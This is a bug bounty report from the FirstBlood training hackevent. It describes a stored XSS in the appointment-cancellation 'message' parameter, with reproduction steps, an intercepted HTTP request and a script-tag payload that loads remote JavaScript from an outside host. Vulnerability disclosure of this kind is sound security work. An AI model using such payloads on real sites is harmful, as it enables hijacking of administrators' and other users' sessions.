FirstBlood-#202Sxss`leads to manything entire site manipulation



On 2021-05-11, prob_hakz reported:

bug

     stored xss on cancelled.php endpoint

poc

create a report at /book-appointment.html endpoint

Now go to /yourappointments.php and give uuid

now hit the cancel the request and intercept it

2 post parameters will be passed act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3

Now add message and the payload like below

act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3 &message="><script/src=//14.rs>

now login as admin or non admin and goto canelled request page to see the popup

http request

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49538
Content-Length: 90
csrf: 99215d4e-0ff3-4275
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://firstbloodhackers.com:49538
Referer: http://firstbloodhackers.com:49538/manageappointment.php?success&aptid=b9f4b531-5b7a-4893-a849-ca3cc38b95f3
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: beta=true; doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=28def95046e533dc234c1475c
Connection: close

act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3&message="><script/src=//14.rs>

impact

same as my previous report it is non admin to anyone so its a huge impact like as i mentioned in report https://www.bugbountyhunter.com/hackevents/report?id=200

P1 CRITICAL

Endpoint: /api/ma.php

Parameter: message

Payload: "><script/src=//14.rs>


FirstBlood ID: 8
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.